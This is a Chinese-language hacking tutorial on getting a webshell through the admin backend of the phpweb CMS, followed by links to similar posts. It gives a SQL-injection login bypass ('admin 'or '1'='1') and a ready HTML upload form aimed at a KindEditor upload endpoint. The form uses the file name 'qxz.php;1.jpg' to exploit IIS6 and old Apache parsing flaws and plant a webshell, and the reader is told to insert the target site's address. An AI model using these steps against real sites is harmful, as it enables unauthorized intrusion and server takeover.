phpweb后台拿shell方法
首先登录后台admin.php(默认后台admin.php)
有的phpweb网站存在万能密码登录
帐号密码都输入:admin 'or '1'='1直接登录
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。
<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="qxz.php;1.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
phpweb后台拿shell方法相关推荐
- phpweb后台拿shell简单方法
关于phpweb后台拿shell简单方法. 首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地 ...
- 网站后台拿shell方法总结
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全 ...
- Ecshop后台拿shell方法总结
方法一:龙儿心发明的,版本未定,估计都行. 进入后台-系统设置-Flash播放器管理 可以上传任意文件. [includes/fckeditor /editor/filemanager/connect ...
- php用户管理拿shell,PHPWEB网站管理系统后台拿shell
前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的 去百度一下 那个方法失效 版本: V1.4.3 / 20100925 无奈中 于是在刁科 ...
- 帝国 loginjs.php,帝国cms 6.6 后台拿shell
时间:2013-02-27来源:源码库 作者:源码库 文章热度: ℃ 漏洞作者: 付弘雪 提交时间: 2013-01-21 公开时间: 2013-01-21 漏洞类型: 文件上传导致任意代码执行 简要 ...
- 后台得到webshell方法大汇总
动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...
- joomla后台拿shell
整理了joomla后台拿shell的几种方法,不解释,至于怎么进后台晓得也不晓得- 第一种 官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加&l ...
- 后台拿shell全集
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧! 今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望 ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
最新文章
- 自创数据集,用TensorFlow预测股票教程 !(附代码)
- oracle 错误2 启动服务提示找不到指定文件_Weblogic中间件创建文件权限问题解决...
- mysql数据结构参考书籍_mysql数据结构相关
- OSG的垃圾回收机制
- 微软MS10-046漏洞的利用
- 人工智能的前景:更高智慧的体的诞生
- 远程登录telnet 连接失败的解决方法
- PHP pathinfo() 函数【获取文件后缀】
- Python官方开发文档(中文版)
- 智和网管平台SugarNMS网络安全解决方案
- sap服务器的文件管理,SAPPLM 文档管理介绍
- EasyAdmin极简社区论坛系统源码
- go:循环冗余校验(CRC)(附完整源码)
- yum的配置文件yum.conf详解
- JVM 之 JDK安装与配置
- 数据堂将出席盖世汽车2021第三届汽车智能座舱与用户体验大会
- 理解sparse coding
- 【Typora】添加水印
- hawk -- pacemaker web GUI
- JVM帝国一日游【穿越小说】